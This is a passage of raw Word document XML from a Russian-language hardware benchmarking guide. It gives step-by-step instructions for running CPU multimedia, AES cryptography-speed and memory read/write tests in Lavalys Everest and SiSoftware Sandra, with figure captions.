        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2752950" cy="878892"/>
            <wp:effectExtent l="19050" t="0" r="9300" b="0"/>
            <wp:docPr id="5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5" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2755985" cy="879861"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 4  – Результаты арифметического теста процессора в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</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1.2 Мультимедийный тест процессора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тест дает возможность оценить производительность системы в работе с мультимедийными данными при использовании поддерживаемых процессором наборов SIMD-инструкций (например, MMX, 3DNow и SSE).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.1 Тестирование  при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CPU PhotoWorxx — тестирует производительность блоков целочисленных арифметических операций, умножения, а также подсистемы памяти при выполнении ряда стандартных операций с изображениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для выполнения теста в окне программы выберите тест «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PhotoWorxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>» и нажать кнопку «Обновить». По окончанию теста программа выводит результат тестируемого и эталонных процессоров (рис. 5).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2666550" cy="1551782"/>
            <wp:effectExtent l="19050" t="0" r="450" b="0"/>
            <wp:docPr id="5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6" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2667241" cy="1552184"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 5 - Мультимедийный тест процессора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.2 Тестирование при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sisoftware</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sandra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для выполнения теста выберите, во вкладке «эталонные тесты», «мультимедийный тест процессора» и нажмите кнопку «обновить» (рис. 6).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1946550" cy="1260120"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="5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7" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1948905" cy="1261644"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 6 – Мультимедийный тест процессора</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1.3 Тест «Производительность криптографии»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.1 Тестирование при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CPU AES — тестирует скорость процессора при выполнении шифрования по симметричному алгоритму блочного шифрования «Rijndael», размер блока 128 бит, ключ 128/192/256 бит. Способен использовать низкоуровневые команды шифрования процессоров VIA C3 и C7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для выполнения теста в окне программы выберите тест «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>» и нажмите кнопку «Обновить» (рис.7).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3131896" cy="1785600"/>
            <wp:effectExtent l="1905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358" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3133506" cy="1786518"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 7 - Тест «производительность криптографии»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.2 Тестирование при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sisoftware</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sandra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Во вкладке «эталонные тесты» выберите тест «производительность криптографии»  и нажмите «обновить» (рис. 8).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1831350" cy="1193141"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="5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59" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1832936" cy="1194174"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 8 - Тест «производительность криптографии»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="00AD5D04" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="005918E0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Тестирование памяти</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Тест «Чтение из памяти» при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестируется скорость пересылки данных из ОЗУ к процессору.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для выполнения теста в окне программы выберите тест «Чтение из памяти» и нажмите кнопку «Обновить» (рис. 9).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2162841" cy="1360800"/>
            <wp:effectExtent l="19050" t="0" r="8859"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60" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2165391" cy="1362404"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок  9 – Тест «чтение из памяти»</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 xml:space="preserve">2.2 Тест «Запись в память» при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестируется среднее время записи данных в ОЗУ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для выполнения теста в окне программы выбрать тест «Запись в память» и нажать кнопку «Обновить» (рис. 10).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
